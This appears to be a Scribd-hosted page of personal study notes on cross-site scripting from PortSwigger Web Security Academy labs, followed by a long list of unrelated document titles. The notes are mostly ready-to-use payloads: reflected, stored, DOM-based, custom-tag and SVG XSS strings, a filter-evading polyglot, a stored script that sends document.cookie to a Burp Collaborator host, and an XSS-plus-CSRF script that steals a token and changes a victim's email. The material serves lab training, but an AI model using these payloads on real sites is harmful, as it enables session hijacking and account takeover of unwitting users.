Message

The document provides a comprehensive cheat sheet for Cross-Site Scripting (XSS) vulnerabilities, detailing various payloads and detection methods. It includes examples of reflected and stored XSS, as well as techniques to exploit DOM-based vulnerabilities. Additionally, it covers custom tags, HTML encodings, and the integration of XSS with CSRF attacks.

Uploaded by

add

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

23 views3 pages

Message

Uploaded by

add

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

You are on page 1/ 3

https://portswigger.

net/web-security/cross-site-scripting/cheat-sheet
Burp Pro Deep Active Scan detects simple Reflected XSS:
![[Pasted image 20240229102907.png]]
Also DOM Based Basic
![[Pasted image 20240229105537.png]]
Send TO Victim Payloads:
```
<iframe src="https://0ae8000403c2b63d86144f3a00cb009a.web-security-academy.net/#"
onload="this.src+='<img src=x onerror=print()>'"></iframe>

(stored)
<script>
location="https://burpcolaborator/?leaked=" + document.cookie;
</script>

<a href=# onclick="window.open('https://0aa8009904d13c3980295dc300300029.web-

security-academy.net/?search=<xss autofocus tabindex=1
onfocusin=alert(document.cookie)></xss>')">XSS</a>" (user interaction required)

(create a form and fetch passwd)

```
Payloads
```
<script>alert(1)</script>
<img src=x onerror=alert(1)>

(attribute with angle brackets encoded)

j1kde"onfocus="alert(1)"autofocus="ava00
"onmouseover="alert(1)

(javascript string with angle brackets encoded):

17762';alert(1)//824
'-alert(1)-'

backslash instead of encoding:

(var tracker={track(){}};tracker.track('http://pito.com');-alert(1)//');)
http://pito.com?'-alert(1)-'
http://pito.com');-alert(1)//

template literals with encodings:

${alert(1)}
also magic polyglot:
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*

```
HTML ENCODINGS:
https://www.degraeve.com/reference/specialcharacters.php
DOM
```
-> location.search query + Document.write (Burp Scan)
window.location.search)).get('search')
document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
payload = '"><script>alert(1)</script>

-> location.search + innert.html (Burp Scan)

query = (new URLSearchParams(window.location.search)).get('search')
document.getElementById('searchMessage').innerHTML = query;
payload = <img src=x onerror=alert(1)>

-> jquery anchor href + location.search (Burp Scan)

href", (new URLSearchParams(window.location.search)).get('returnPath'));
payload = ?returnPath=javascript:alert(document.cookie)

-> hashchange event in jquery (Burp Scan)

hashchange', function(){ var post = $('section.blog-list h2:contains(' +
decodeURIComponent(window.location.hash.slice(1)) + ')')
payload = https://.../#<img src=1 onerror=alert(1)>

-> document.write with location.search param

&storeId="><script>alert(1)</script>

-> angular JS prior to 1.8 vulnerable to:

-> html.replace('<', '<').replace('>', '>'); in a string, single occurrence

<><img src=x onerror=alert(1)>
```

More elaborated DOM:

![[Pasted image 20240303164438.png]]
```
\"}-alert(1)//
```

Stored:
```
Check for hrefs: javascript:alert(1)
Check for str.replace: <> <img...
```

Banned tags:
use brute force of tag, and event with the cheatlist
![[Pasted image 20240303170455.png]]

Custom Tags:
![[Pasted image 20240303233054.png]]
```
<custom-tag onmouseover=alert(1)> (user interaction)
<xss id=x onmouseover=alert(document.cookie) tabindex=1> (user interaction)
GOD:
<xss autofocus tabindex=1 onfocusin=alert(document.cookie)></xss>
<custom-tag autofocus tabindex=1 onfocusin=alert(document.cookie)></xss>

svg markup:
<svg><animatetransform onbegin=alert(1) attributeName=x dur=1s>
```
Custom exceptions:
```
-> <link rel="canonical" href="https://example.com/page" />
Param reflected ex: <link rel="canonical" href="https://example.com/page?param" />
?'accesskey='x'onclick='alert(1) (required ALT+X / ALT+SHIFT+X)
```
![[Pasted image 20240304112343.png]]
XSS + CSRF
```
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&[email protected]')
};
</script>
```

Burp Update
No ratings yet
Burp Update
26 pages
Stages in Exam of The Exam
No ratings yet
Stages in Exam of The Exam
3 pages
Stage 1: Example 1
No ratings yet
Stage 1: Example 1
9 pages
BSCP Tracker
No ratings yet
BSCP Tracker
207 pages
Burp Suite Cheat Sheet by Codelivly
No ratings yet
Burp Suite Cheat Sheet by Codelivly
5 pages
BSCP Official Exam
100% (2)
BSCP Official Exam
12 pages
Web Application Penetration Testing EXtreme - 1
100% (3)
Web Application Penetration Testing EXtreme - 1
300 pages
Lect26 - XSS Using Burp Suite
No ratings yet
Lect26 - XSS Using Burp Suite
33 pages
Brute-Forcing Stay-Logged-In Cookies
No ratings yet
Brute-Forcing Stay-Logged-In Cookies
11 pages
Information Security XSS Lab Guide
No ratings yet
Information Security XSS Lab Guide
14 pages
BSCP5
No ratings yet
BSCP5
88 pages
CH 006
No ratings yet
CH 006
32 pages
Burp Suit Tips
75% (4)
Burp Suit Tips
105 pages
Burp Suite Training: Basics to Advanced
No ratings yet
Burp Suite Training: Basics to Advanced
10 pages
Burp Suite Login Brute Force Guide
No ratings yet
Burp Suite Login Brute Force Guide
5 pages
Cyber Attack Vectors 2022 Guide
No ratings yet
Cyber Attack Vectors 2022 Guide
32 pages
Burp Suite Training Part1,2
No ratings yet
Burp Suite Training Part1,2
7 pages
Access Control Vulnerabilities Labs Guide
No ratings yet
Access Control Vulnerabilities Labs Guide
22 pages
Mutillidae Test Scripts
No ratings yet
Mutillidae Test Scripts
27 pages
Burp Suite Tips and Tricks Guide
No ratings yet
Burp Suite Tips and Tricks Guide
43 pages
? Burp Suite Tools Explained
No ratings yet
? Burp Suite Tools Explained
6 pages
SQL Injection Lab Guide
No ratings yet
SQL Injection Lab Guide
23 pages
20bcs4908 Ashwani Sharma Wms Exp 3
No ratings yet
20bcs4908 Ashwani Sharma Wms Exp 3
7 pages
SEO Tips for Web Security Testing
No ratings yet
SEO Tips for Web Security Testing
3 pages
Web Application Penetration Testing Guide
No ratings yet
Web Application Penetration Testing Guide
60 pages
Cross Site Scripting XSS
100% (1)
Cross Site Scripting XSS
31 pages
JBOSP+ +level+4+ +Offensive+Security+Colonel+ (OSC)
No ratings yet
JBOSP+ +level+4+ +Offensive+Security+Colonel+ (OSC)
480 pages
Lab 1
No ratings yet
Lab 1
14 pages
Use Tools in Efficient Way
No ratings yet
Use Tools in Efficient Way
139 pages
Practice Lab 1
No ratings yet
Practice Lab 1
4 pages
XSS Vulnerability Detection and Exploitation
No ratings yet
XSS Vulnerability Detection and Exploitation
1 page
Lab 3 Web Attacks: XSS, XSRF, SQL Injection
0% (1)
Lab 3 Web Attacks: XSS, XSRF, SQL Injection
11 pages
Burp Suite
No ratings yet
Burp Suite
23 pages
BSCP Exam 3
0% (1)
BSCP Exam 3
5 pages
Set The Target Scope - PortSwigger
No ratings yet
Set The Target Scope - PortSwigger
4 pages
Burp Suite Training Guide (Thoery)
No ratings yet
Burp Suite Training Guide (Thoery)
6 pages
Burp Manual
No ratings yet
Burp Manual
24 pages
Web App Security Vulnerabilities Report
No ratings yet
Web App Security Vulnerabilities Report
18 pages
(CyberSec'24) Lab04 - Student Version
No ratings yet
(CyberSec'24) Lab04 - Student Version
44 pages
OWASP Top 10 Lab Manual
No ratings yet
OWASP Top 10 Lab Manual
14 pages
IAW301 SE161501 Lab6
No ratings yet
IAW301 SE161501 Lab6
22 pages
ELearnSecurity EWPTX Notes Basic by Joas
No ratings yet
ELearnSecurity EWPTX Notes Basic by Joas
311 pages
(English (Auto-Generated) ) Ethical Hacking 101 - Web App Penetration Testing - A Full Course For Beginners (DownSub - Com)
No ratings yet
(English (Auto-Generated) ) Ethical Hacking 101 - Web App Penetration Testing - A Full Course For Beginners (DownSub - Com)
149 pages
XSS Vulnerabilities Explained
0% (1)
XSS Vulnerabilities Explained
31 pages
Tip Trick Day Before Exam
No ratings yet
Tip Trick Day Before Exam
3 pages
Burp Suite Training Part 1 Handson
No ratings yet
Burp Suite Training Part 1 Handson
4 pages
Burpsuit Handson Part1,2,3,4,5 (Thoery)
No ratings yet
Burpsuit Handson Part1,2,3,4,5 (Thoery)
6 pages
Walkthrough 1889
No ratings yet
Walkthrough 1889
12 pages
Lab 08 Task
No ratings yet
Lab 08 Task
8 pages
Port Swigger Lab
No ratings yet
Port Swigger Lab
6 pages
Translated Copy of Translated Copy of BurpSuite
No ratings yet
Translated Copy of Translated Copy of BurpSuite
71 pages
Sie 7
No ratings yet
Sie 7
2 pages
Burp Suit Essentials
No ratings yet
Burp Suit Essentials
11 pages
Security Report
No ratings yet
Security Report
27 pages
2 JBOSP Level 4 Offensive Security Colonel OSC Stamped
No ratings yet
2 JBOSP Level 4 Offensive Security Colonel OSC Stamped
480 pages
BurpSuite User Pocket Guide
No ratings yet
BurpSuite User Pocket Guide
23 pages
Why Work With A Realtor
No ratings yet
Why Work With A Realtor
1 page
GIT 2st QP (2024)
No ratings yet
GIT 2st QP (2024)
1 page
VLSI Logic & Fault Simulation
No ratings yet
VLSI Logic & Fault Simulation
97 pages
CKRUET Admission Choices 2023-24
No ratings yet
CKRUET Admission Choices 2023-24
1 page
Lesson 5 - Proclamation of The PH Independence
No ratings yet
Lesson 5 - Proclamation of The PH Independence
26 pages
Appin Technology Lab: Homtech Diploma Program Embedded Systems and Robotics Course Content (2010-2011)
No ratings yet
Appin Technology Lab: Homtech Diploma Program Embedded Systems and Robotics Course Content (2010-2011)
7 pages
Delgado Routing Slip
No ratings yet
Delgado Routing Slip
1 page
Allengers 100 Service
100% (1)
Allengers 100 Service
54 pages
Excerpt PDF
No ratings yet
Excerpt PDF
10 pages
Calspec MFL SN 3011013 Exp 24-09-2025
No ratings yet
Calspec MFL SN 3011013 Exp 24-09-2025
2 pages
A-Z Vocab Series by Rupam Mam
No ratings yet
A-Z Vocab Series by Rupam Mam
1,020 pages
4 Anime
No ratings yet
4 Anime
3 pages
LESSON PLAN - The Great Kapok Tree
No ratings yet
LESSON PLAN - The Great Kapok Tree
3 pages
Demand, Supply, and Market Equilibrium
No ratings yet
Demand, Supply, and Market Equilibrium
4 pages
IS516 Part4 2018
No ratings yet
IS516 Part4 2018
20 pages
Belenus Champion Hospital Bill Summary
No ratings yet
Belenus Champion Hospital Bill Summary
3 pages
Colortune: Fuel System Fault Diagnostic Chart
No ratings yet
Colortune: Fuel System Fault Diagnostic Chart
1 page
Regulations BBA Police Security Studies
No ratings yet
Regulations BBA Police Security Studies
5 pages
Understanding Local Anesthetic Toxicity
No ratings yet
Understanding Local Anesthetic Toxicity
11 pages
Solar 2 kg Auto Roaster Specs
No ratings yet
Solar 2 kg Auto Roaster Specs
1 page
Peugeot B0092 Engine Brake Troubleshooting
No ratings yet
Peugeot B0092 Engine Brake Troubleshooting
4 pages
All Questionnaire
No ratings yet
All Questionnaire
172 pages
Employee Records Management
No ratings yet
Employee Records Management
7 pages
API 571 Qustion
100% (2)
API 571 Qustion
37 pages
Chapter One: 1.1. Back Ground of The Study
No ratings yet
Chapter One: 1.1. Back Ground of The Study
18 pages
Dissertation Finalreport PDF
100% (2)
Dissertation Finalreport PDF
55 pages
Air Tool Desiccant Dryer Layout
No ratings yet
Air Tool Desiccant Dryer Layout
2 pages
Physics Part 2 Important Short and Long Questions
No ratings yet
Physics Part 2 Important Short and Long Questions
9 pages
Duplex Construction Cost Breakdown
100% (1)
Duplex Construction Cost Breakdown
1 page
Globalization Debate in US Universities
100% (1)
Globalization Debate in US Universities
5 pages